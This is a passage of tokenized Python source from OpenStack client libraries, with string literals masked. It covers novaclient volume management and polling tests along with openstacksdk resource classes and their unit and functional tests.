"<STR_LIT:3>" , <EOL> action = action , <EOL> show_progress = True , <EOL> silent = False ) <EOL> stdout_arg_list = [ <EOL> mock . call ( "<STR_LIT:\n>" ) , <EOL> mock . call ( "<STR_LIT>" % action ) , <EOL> mock . call ( "<STR_LIT>" % action ) , <EOL> mock . call ( "<STR_LIT>" % action ) , <EOL> mock . call ( "<STR_LIT>" ) , <EOL> mock . call ( "<STR_LIT:\n>" ) ] <EOL> self . assertEqual ( <EOL> stdout_arg_list , <EOL> mock_stdout . write . call_args_list <EOL> ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_error_state ( self , mock_time ) : <EOL> fault_msg = "<STR_LIT>" <EOL> updated_objects = ( <EOL> base . Resource ( None , info = { "<STR_LIT:status>" : "<STR_LIT:error>" , <EOL> "<STR_LIT>" : { "<STR_LIT:message>" : fault_msg } } ) , <EOL> base . 
Resource ( None , info = { "<STR_LIT:status>" : "<STR_LIT:error>" } ) ) <EOL> poll_fn = mock . MagicMock ( side_effect = updated_objects ) <EOL> action = "<STR_LIT>" <EOL> self . assertRaises ( exceptions . ResourceInErrorState , <EOL> novaclient . v2 . shell . _poll_for_status , <EOL> poll_fn = poll_fn , <EOL> obj_id = "<STR_LIT>" , <EOL> final_ok_states = [ "<STR_LIT>" ] , <EOL> poll_period = "<STR_LIT:3>" , <EOL> action = action , <EOL> show_progress = True , <EOL> silent = False ) <EOL> self . assertRaises ( exceptions . ResourceInErrorState , <EOL> novaclient . v2 . shell . _poll_for_status , <EOL> poll_fn = poll_fn , <EOL> obj_id = "<STR_LIT>" , <EOL> final_ok_states = [ "<STR_LIT>" ] , <EOL> poll_period = "<STR_LIT:3>" , <EOL> action = action , <EOL> show_progress = True , <EOL> silent = False ) </s>
<s> """<STR_LIT>""" <EOL> from novaclient import base <EOL> class Volume ( base . Resource ) : <EOL> """<STR_LIT>""" <EOL> NAME_ATTR = '<STR_LIT>' <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . id <EOL> class VolumeManager ( base . Manager ) : <EOL> """<STR_LIT>""" <EOL> resource_class = Volume <EOL> def create_server_volume ( self , server_id , volume_id , device = None ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : volume_id } } <EOL> if device is not None : <EOL> body [ '<STR_LIT>' ] [ '<STR_LIT>' ] = device <EOL> return self . _create ( "<STR_LIT>" % server_id , <EOL> body , "<STR_LIT>" ) <EOL> def update_server_volume ( self , server_id , attachment_id , new_volume_id ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : new_volume_id } } <EOL> return self . _update ( "<STR_LIT>" % <EOL> ( server_id , attachment_id , ) , <EOL> body , "<STR_LIT>" ) <EOL> def get_server_volume ( self , server_id , attachment_id ) : <EOL> """<STR_LIT>""" <EOL> return self . _get ( "<STR_LIT>" % ( server_id , <EOL> attachment_id , ) , "<STR_LIT>" ) <EOL> def get_server_volumes ( self , server_id ) : <EOL> """<STR_LIT>""" <EOL> return self . _list ( "<STR_LIT>" % server_id , <EOL> "<STR_LIT>" ) <EOL> def delete_server_volume ( self , server_id , attachment_id ) : <EOL> """<STR_LIT>""" <EOL> return self . _delete ( "<STR_LIT>" % <EOL> ( server_id , attachment_id , ) ) </s>
<s> from openstack import service_filter <EOL> class ClusterService ( service_filter . ServiceFilter ) : <EOL> """<STR_LIT>""" <EOL> valid_versions = [ service_filter . ValidVersion ( '<STR_LIT>' ) ] <EOL> UNVERSIONED = None <EOL> def __init__ ( self , version = None ) : <EOL> """<STR_LIT>""" <EOL> super ( ClusterService , self ) . __init__ ( <EOL> service_type = '<STR_LIT>' , <EOL> version = version <EOL> ) </s>
<s> import six <EOL> from openstack . compute import compute_service <EOL> from openstack import resource <EOL> class ServerIP ( resource . Resource ) : <EOL> id_attribute = '<STR_LIT>' <EOL> resource_key = '<STR_LIT>' <EOL> resources_key = '<STR_LIT>' <EOL> base_path = '<STR_LIT>' <EOL> service = compute_service . ComputeService ( ) <EOL> allow_list = True <EOL> addr = resource . prop ( '<STR_LIT>' ) <EOL> network_label = resource . prop ( '<STR_LIT>' ) <EOL> server_id = resource . prop ( '<STR_LIT>' ) <EOL> version = resource . prop ( '<STR_LIT:version>' ) <EOL> @ classmethod <EOL> def list ( cls , session , path_args = None , ** params ) : <EOL> url = cls . _get_url ( path_args ) <EOL> resp = session . get ( url , endpoint_filter = cls . service , params = params ) <EOL> resp = resp . json ( ) <EOL> ray = [ ] <EOL> for network_label , addresses in six . iteritems ( resp [ '<STR_LIT>' ] ) : <EOL> for address in addresses : <EOL> record = { <EOL> '<STR_LIT>' : path_args [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : network_label , <EOL> '<STR_LIT:version>' : address [ '<STR_LIT:version>' ] , <EOL> '<STR_LIT>' : address [ '<STR_LIT>' ] , <EOL> } <EOL> ray . append ( cls . existing ( ** record ) ) <EOL> return ray </s>
<s> from openstack . identity import identity_service <EOL> from openstack import resource <EOL> class Version ( resource . Resource ) : <EOL> resource_key = '<STR_LIT:version>' <EOL> resources_key = '<STR_LIT>' <EOL> base_path = '<STR_LIT:/>' <EOL> service = identity_service . IdentityService ( <EOL> version = identity_service . IdentityService . UNVERSIONED <EOL> ) <EOL> allow_list = True <EOL> media_types = resource . prop ( '<STR_LIT>' ) <EOL> status = resource . prop ( '<STR_LIT:status>' ) <EOL> updated = resource . prop ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def list ( cls , session , ** params ) : <EOL> resp = session . get ( cls . base_path , endpoint_filter = cls . service , <EOL> params = params ) <EOL> resp = resp . json ( ) <EOL> for data in resp [ cls . resources_key ] [ '<STR_LIT>' ] : <EOL> yield cls . existing ( ** data ) </s>
<s> from openstack . network import network_service <EOL> from openstack import resource <EOL> class AddressScope ( resource . Resource ) : <EOL> resource_key = '<STR_LIT>' <EOL> resources_key = '<STR_LIT>' <EOL> base_path = '<STR_LIT>' <EOL> service = network_service . NetworkService ( ) <EOL> allow_create = True <EOL> allow_retrieve = True <EOL> allow_update = True <EOL> allow_delete = True <EOL> allow_list = True <EOL> name = resource . prop ( '<STR_LIT:name>' ) <EOL> project_id = resource . prop ( '<STR_LIT>' ) <EOL> ip_version = resource . prop ( '<STR_LIT>' , type = int ) <EOL> is_shared = resource . prop ( '<STR_LIT>' , type = bool ) </s>
<s> from openstack import service_filter <EOL> class OrchestrationService ( service_filter . ServiceFilter ) : <EOL> """<STR_LIT>""" <EOL> valid_versions = [ service_filter . ValidVersion ( '<STR_LIT>' ) ] <EOL> def __init__ ( self , version = None ) : <EOL> """<STR_LIT>""" <EOL> super ( OrchestrationService , self ) . __init__ ( <EOL> service_type = '<STR_LIT>' , <EOL> version = version <EOL> ) </s>
<s> import uuid <EOL> from openstack . block_store . v2 import volume as _volume <EOL> from openstack . tests . functional import base <EOL> class TestVolume ( base . BaseFunctionalTest ) : <EOL> VOLUME_NAME = uuid . uuid4 ( ) . hex <EOL> VOLUME_ID = None <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestVolume , cls ) . setUpClass ( ) <EOL> volume = cls . conn . block_store . create_volume ( <EOL> name = cls . VOLUME_NAME , <EOL> size = <NUM_LIT:1> ) <EOL> cls . conn . block_store . wait_for_status ( volume , <EOL> status = '<STR_LIT>' , <EOL> failures = [ '<STR_LIT:error>' ] , <EOL> interval = <NUM_LIT:2> , <EOL> wait = <NUM_LIT> ) <EOL> assert isinstance ( volume , _volume . Volume ) <EOL> cls . assertIs ( cls . VOLUME_NAME , volume . name ) <EOL> cls . VOLUME_ID = volume . id <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> sot = cls . conn . block_store . delete_volume ( cls . VOLUME_ID , <EOL> ignore_missing = False ) <EOL> cls . assertIs ( None , sot ) <EOL> def test_get ( self ) : <EOL> sot = self . conn . block_store . get_volume ( self . VOLUME_ID ) <EOL> self . assertEqual ( self . VOLUME_NAME , sot . name ) </s>
<s> import unittest <EOL> import uuid <EOL> from openstack . tests . functional import base <EOL> @ unittest . skip ( "<STR_LIT>" ) <EOL> @ unittest . skipUnless ( base . service_exists ( service_type = "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> class TestAlarmChange ( base . BaseFunctionalTest ) : <EOL> NAME = uuid . uuid4 ( ) . hex <EOL> alarm = None <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( TestAlarmChange , cls ) . setUpClass ( ) <EOL> meter = next ( cls . conn . telemetry . meters ( ) ) <EOL> alarm = cls . conn . telemetry . create_alarm ( <EOL> name = cls . NAME , <EOL> type = '<STR_LIT>' , <EOL> threshold_rule = { <EOL> '<STR_LIT>' : meter . name , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> ) <EOL> cls . alarm = alarm <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> cls . conn . telemetry . delete_alarm ( cls . alarm , ignore_missing = False ) <EOL> def test_list ( self ) : <EOL> change = next ( self . conn . telemetry . alarm_changes ( self . alarm ) ) <EOL> self . assertEqual ( self . alarm . id , change . alarm_id ) <EOL> self . assertEqual ( '<STR_LIT>' , change . type ) </s>
<s> import datetime <EOL> import testtools <EOL> from openstack . compute . v2 import extension <EOL> IDENTIFIER = '<STR_LIT>' <EOL> EXAMPLE = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:description>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT:name>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> class TestExtension ( testtools . TestCase ) : <EOL> def test_basic ( self ) : <EOL> sot = extension . Extension ( ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resource_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resources_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . base_path ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . service . service_type ) <EOL> self . assertFalse ( sot . allow_create ) <EOL> self . assertTrue ( sot . allow_retrieve ) <EOL> self . assertFalse ( sot . allow_update ) <EOL> self . assertFalse ( sot . allow_delete ) <EOL> self . assertTrue ( sot . allow_list ) <EOL> def test_make_it ( self ) : <EOL> sot = extension . Extension ( EXAMPLE ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . alias ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:description>' ] , sot . description ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . links ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:name>' ] , sot . name ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . namespace ) <EOL> dt = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:9> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) . replace ( <EOL> tzinfo = None ) <EOL> self . assertEqual ( dt , sot . updated_at . replace ( tzinfo = None ) ) </s>
<s> import testtools <EOL> from openstack . identity . v3 import endpoint <EOL> IDENTIFIER = '<STR_LIT>' <EOL> EXAMPLE = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:id>' : IDENTIFIER , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> } <EOL> class TestEndpoint ( testtools . TestCase ) : <EOL> def test_basic ( self ) : <EOL> sot = endpoint . Endpoint ( ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resource_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resources_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . base_path ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . service . service_type ) <EOL> self . assertTrue ( sot . allow_create ) <EOL> self . assertTrue ( sot . allow_retrieve ) <EOL> self . assertTrue ( sot . allow_update ) <EOL> self . assertTrue ( sot . allow_delete ) <EOL> self . assertTrue ( sot . allow_list ) <EOL> def test_make_it ( self ) : <EOL> sot = endpoint . Endpoint ( EXAMPLE ) <EOL> self . assertTrue ( sot . is_enabled ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:id>' ] , sot . id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . interface ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . region_id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . service_id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:url>' ] , sot . url ) </s>
<s> import mock <EOL> import testtools <EOL> from openstack . metric . v1 import archive_policy <EOL> EXAMPLE = { <EOL> '<STR_LIT>' : <EOL> [ <EOL> { u'<STR_LIT>' : <NUM_LIT:12> , u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } , <EOL> { u'<STR_LIT>' : <NUM_LIT> , u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } , <EOL> { u'<STR_LIT>' : <NUM_LIT:30> , u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } , <EOL> ] , <EOL> u'<STR_LIT>' : <NUM_LIT:0> , <EOL> u'<STR_LIT:name>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : [ u'<STR_LIT>' , u'<STR_LIT>' ] <EOL> } <EOL> class TestArchivePolicy ( testtools . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestArchivePolicy , self ) . setUp ( ) <EOL> self . resp = mock . Mock ( ) <EOL> self . resp . body = '<STR_LIT>' <EOL> self . sess = mock . Mock ( ) <EOL> self . sess . put = mock . Mock ( return_value = self . resp ) <EOL> def test_basic ( self ) : <EOL> m = archive_policy . ArchivePolicy ( ) <EOL> self . assertIsNone ( m . resource_key ) <EOL> self . assertIsNone ( m . resources_key ) <EOL> self . assertEqual ( '<STR_LIT>' , m . base_path ) <EOL> self . assertEqual ( '<STR_LIT>' , m . service . service_type ) <EOL> self . assertTrue ( m . allow_create ) <EOL> self . assertTrue ( m . allow_retrieve ) <EOL> self . assertFalse ( m . allow_update ) <EOL> self . assertTrue ( m . allow_delete ) <EOL> self . assertTrue ( m . allow_list ) <EOL> def test_make_it ( self ) : <EOL> m = archive_policy . ArchivePolicy ( EXAMPLE ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:name>' ] , m . name ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , m . definition ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , m . back_window ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , m . aggregation_methods ) </s>
<s> import testtools <EOL> from openstack . network . v2 import vpn_service <EOL> IDENTIFIER = '<STR_LIT>' <EOL> EXAMPLE = { <EOL> "<STR_LIT>" : "<STR_LIT:1>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : "<STR_LIT:2>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT:3>" , <EOL> "<STR_LIT>" : "<STR_LIT:4>" , <EOL> "<STR_LIT:id>" : IDENTIFIER , <EOL> "<STR_LIT:description>" : "<STR_LIT:5>" <EOL> } <EOL> class TestVPNService ( testtools . TestCase ) : <EOL> def test_basic ( self ) : <EOL> sot = vpn_service . VPNService ( ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resource_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . resources_key ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . base_path ) <EOL> self . assertEqual ( '<STR_LIT>' , sot . service . service_type ) <EOL> self . assertTrue ( sot . allow_create ) <EOL> self . assertTrue ( sot . allow_retrieve ) <EOL> self . assertTrue ( sot . allow_update ) <EOL> self . assertTrue ( sot . allow_delete ) <EOL> self . assertTrue ( sot . allow_list ) <EOL> def test_make_it ( self ) : <EOL> sot = vpn_service . VPNService ( EXAMPLE ) <EOL> self . assertTrue ( sot . is_admin_state_up ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:description>' ] , sot . description ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:id>' ] , sot . id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:name>' ] , sot . name ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . router_id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . project_id ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT:status>' ] , sot . status ) <EOL> self . assertEqual ( EXAMPLE [ '<STR_LIT>' ] , sot . subnet_id ) </s>
<s> import itertools <EOL> import mock <EOL> import six <EOL> from openstack import exceptions <EOL> from openstack import format <EOL> from openstack import resource2 <EOL> from openstack import session <EOL> from openstack . tests . unit import base <EOL> class TestComponent ( base . TestCase ) : <EOL> class ExampleComponent ( resource2 . _BaseComponent ) : <EOL> key = "<STR_LIT>" <EOL> def test_implementations ( self ) : <EOL> self . assertEqual ( "<STR_LIT>" , resource2 . Body . key ) <EOL> self . assertEqual ( "<STR_LIT>" , resource2 . Header . key ) <EOL> self . assertEqual ( "<STR_LIT>" , resource2 . URI . key ) <EOL> def test_creation ( self ) : <EOL> sot = resource2 . _BaseComponent ( "<STR_LIT:name>" , type = int , default = <NUM_LIT:1> , <EOL> alternate_id = True ) <EOL> self . assertEqual ( "<STR_LIT:name>" , sot . name ) <EOL> self . assertEqual ( int , sot . type ) <EOL> self . assertEqual ( <NUM_LIT:1> , sot . default ) <EOL> self . assertTrue ( sot . alternate_id ) <EOL> def test_get_no_instance ( self ) : <EOL> sot = resource2 . _BaseComponent ( "<STR_LIT:test>" ) <EOL> result = sot . __get__ ( None , None ) <EOL> self . assertIsNone ( result ) <EOL> def test_get_name_None ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> class Parent ( object ) : <EOL> _example = { name : None } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( name , default = <NUM_LIT:1> ) <EOL> result = sot . __get__ ( instance , None ) <EOL> self . assertIsNone ( result ) <EOL> def test_get_default ( self ) : <EOL> expected_result = <NUM_LIT> <EOL> class Parent ( object ) : <EOL> _example = { } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" , type = dict , <EOL> default = expected_result ) <EOL> result = sot . __get__ ( instance , None ) <EOL> self . 
assertEqual ( expected_result , result ) <EOL> def test_get_name_untyped ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> expected_result = <NUM_LIT> <EOL> class Parent ( object ) : <EOL> _example = { name : expected_result } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" ) <EOL> result = sot . __get__ ( instance , None ) <EOL> self . assertEqual ( expected_result , result ) <EOL> def test_get_name_typed ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { name : value } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" , type = int ) <EOL> result = sot . __get__ ( instance , None ) <EOL> self . assertEqual ( int ( value ) , result ) <EOL> def test_get_name_formatter ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> value = "<STR_LIT>" <EOL> expected_result = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { name : value } <EOL> class FakeFormatter ( object ) : <EOL> @ classmethod <EOL> def deserialize ( cls , value ) : <EOL> return expected_result <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" , type = FakeFormatter ) <EOL> mock_issubclass = mock . Mock ( return_value = True ) <EOL> module = six . moves . builtins . __name__ <EOL> with mock . patch ( "<STR_LIT>" % module , mock_issubclass ) : <EOL> result = sot . __get__ ( instance , None ) <EOL> self . assertEqual ( expected_result , result ) <EOL> def test_set_name_untyped ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> expected_value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" ) <EOL> sot . __set__ ( instance , expected_value ) <EOL> self . assertEqual ( expected_value , instance . 
_example [ name ] ) <EOL> def test_set_name_typed ( self ) : <EOL> expected_value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { } <EOL> instance = Parent ( ) <EOL> class FakeType ( object ) : <EOL> calls = [ ] <EOL> def __init__ ( self , arg ) : <EOL> FakeType . calls . append ( arg ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" , type = FakeType ) <EOL> sot . __set__ ( instance , expected_value ) <EOL> self . assertEqual ( [ expected_value ] , FakeType . calls ) <EOL> def test_set_name_formatter ( self ) : <EOL> expected_value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { } <EOL> instance = Parent ( ) <EOL> class FakeFormatter ( format . Formatter ) : <EOL> calls = [ ] <EOL> @ classmethod <EOL> def serialize ( cls , arg ) : <EOL> FakeFormatter . calls . append ( arg ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" , type = FakeFormatter ) <EOL> sot . __set__ ( instance , expected_value ) <EOL> self . assertEqual ( [ expected_value ] , FakeFormatter . calls ) <EOL> def test_delete_name ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> expected_value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { name : expected_value } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( "<STR_LIT:name>" ) <EOL> sot . __delete__ ( instance ) <EOL> self . assertNotIn ( name , instance . _example ) <EOL> def test_delete_name_doesnt_exist ( self ) : <EOL> name = "<STR_LIT:name>" <EOL> expected_value = "<STR_LIT>" <EOL> class Parent ( object ) : <EOL> _example = { "<STR_LIT>" : expected_value } <EOL> instance = Parent ( ) <EOL> sot = TestComponent . ExampleComponent ( name ) <EOL> sot . __delete__ ( instance ) <EOL> self . assertNotIn ( name , instance . _example ) <EOL> class TestComponentManager ( base . TestCase ) : <EOL> def test_create_basic ( self ) : <EOL> sot = resource2 . _ComponentManager ( ) <EOL> self . assertEqual ( dict ( ) , sot . attributes ) <EOL> self . 
assertEqual ( set ( ) , sot . _dirty ) <EOL> def test_create_unsynced ( self ) : <EOL> attrs = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:2> , "<STR_LIT:hello>" : <NUM_LIT:3> } <EOL> sync = False <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = sync ) <EOL> self . assertEqual ( attrs , sot . attributes ) <EOL> self . assertEqual ( set ( attrs . keys ( ) ) , sot . _dirty ) <EOL> def test_create_synced ( self ) : <EOL> attrs = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:2> , "<STR_LIT:hello>" : <NUM_LIT:3> } <EOL> sync = True <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = sync ) <EOL> self . assertEqual ( attrs , sot . attributes ) <EOL> self . assertEqual ( set ( ) , sot . _dirty ) <EOL> def test_getitem ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> value = "<STR_LIT:value>" <EOL> attrs = { key : value } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs ) <EOL> self . assertEqual ( value , sot . __getitem__ ( key ) ) <EOL> def test_setitem_new ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> value = "<STR_LIT:value>" <EOL> sot = resource2 . _ComponentManager ( ) <EOL> sot . __setitem__ ( key , value ) <EOL> self . assertIn ( key , sot . attributes ) <EOL> self . assertIn ( key , sot . dirty ) <EOL> def test_setitem_unchanged ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> value = "<STR_LIT:value>" <EOL> attrs = { key : value } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = True ) <EOL> sot . __setitem__ ( key , value ) <EOL> self . assertEqual ( value , sot . attributes [ key ] ) <EOL> self . assertNotIn ( key , sot . dirty ) <EOL> def test_delitem ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> value = "<STR_LIT:value>" <EOL> attrs = { key : value } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = True ) <EOL> sot . __delitem__ ( key ) <EOL> self . assertIsNone ( sot . 
dirty [ key ] ) <EOL> def test_iter ( self ) : <EOL> attrs = { "<STR_LIT:key>" : "<STR_LIT:value>" } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs ) <EOL> self . assertItemsEqual ( iter ( attrs ) , sot . __iter__ ( ) ) <EOL> def test_len ( self ) : <EOL> attrs = { "<STR_LIT:key>" : "<STR_LIT:value>" } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs ) <EOL> self . assertEqual ( len ( attrs ) , sot . __len__ ( ) ) <EOL> def test_dirty ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> key2 = "<STR_LIT>" <EOL> value = "<STR_LIT:value>" <EOL> attrs = { key : value } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = False ) <EOL> self . assertEqual ( { key : value } , sot . dirty ) <EOL> sot . __setitem__ ( key2 , value ) <EOL> self . assertEqual ( { key : value , key2 : value } , sot . dirty ) <EOL> def test_clean ( self ) : <EOL> key = "<STR_LIT:key>" <EOL> value = "<STR_LIT:value>" <EOL> attrs = { key : value } <EOL> sot = resource2 . _ComponentManager ( attributes = attrs , synchronized = False ) <EOL> self . assertEqual ( attrs , sot . dirty ) <EOL> sot . clean ( ) <EOL> self . assertEqual ( dict ( ) , sot . dirty ) <EOL> class Test_Request ( base . TestCase ) : <EOL> def test_create ( self ) : <EOL> uri = <NUM_LIT:1> <EOL> body = <NUM_LIT:2> <EOL> headers = <NUM_LIT:3> <EOL> sot = resource2 . _Request ( uri , body , headers ) <EOL> self . assertEqual ( uri , sot . uri ) <EOL> self . assertEqual ( body , sot . body ) <EOL> self . assertEqual ( headers , sot . headers ) <EOL> class TestQueryParameters ( base . TestCase ) : <EOL> def test_create ( self ) : <EOL> location = "<STR_LIT:location>" <EOL> mapping = { "<STR_LIT>" : "<STR_LIT>" } <EOL> sot = resource2 . QueryParameters ( location , ** mapping ) <EOL> self . assertEqual ( { "<STR_LIT:location>" : "<STR_LIT:location>" , "<STR_LIT>" : "<STR_LIT>" } , <EOL> sot . 
_mapping ) <EOL> def test_transpose_unmapped ( self ) : <EOL> location = "<STR_LIT:location>" <EOL> mapping = { "<STR_LIT>" : "<STR_LIT>" } <EOL> sot = resource2 . QueryParameters ( location , ** mapping ) <EOL> result = sot . _transpose ( { "<STR_LIT:location>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . assertEqual ( { "<STR_LIT:location>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } , <EOL> result ) <EOL> def test_transpose_not_in_query ( self ) : <EOL> location = "<STR_LIT:location>" <EOL> mapping = { "<STR_LIT>" : "<STR_LIT>" } <EOL> sot = resource2 . QueryParameters ( location , ** mapping ) <EOL> result = sot . _transpose ( { "<STR_LIT:location>" : "<STR_LIT>" } ) <EOL> self . assertEqual ( { "<STR_LIT:location>" : "<STR_LIT>" } , <EOL> result ) <EOL> class TestResource ( base . TestCase ) : <EOL> def test_initialize_basic ( self ) : <EOL> body = { "<STR_LIT:body>" : <NUM_LIT:1> } <EOL> header = { "<STR_LIT>" : <NUM_LIT:2> } <EOL> uri = { "<STR_LIT>" : <NUM_LIT:3> } <EOL> everything = dict ( itertools . chain ( body . items ( ) , header . items ( ) , <EOL> uri . items ( ) ) ) <EOL> mock_collect = mock . Mock ( ) <EOL> mock_collect . return_value = body , header , uri <EOL> with mock . patch . object ( resource2 . Resource , <EOL> "<STR_LIT>" , mock_collect ) : <EOL> sot = resource2 . Resource ( synchronized = False , ** everything ) <EOL> mock_collect . assert_called_once_with ( everything ) <EOL> self . assertIsInstance ( sot . _body , resource2 . _ComponentManager ) <EOL> self . assertEqual ( body , sot . _body . dirty ) <EOL> self . assertIsInstance ( sot . _header , resource2 . _ComponentManager ) <EOL> self . assertEqual ( header , sot . _header . dirty ) <EOL> self . assertIsInstance ( sot . _uri , resource2 . _ComponentManager ) <EOL> self . assertEqual ( uri , sot . _uri . dirty ) <EOL> self . assertFalse ( sot . allow_create ) <EOL> self . assertFalse ( sot . allow_get ) <EOL> self . 
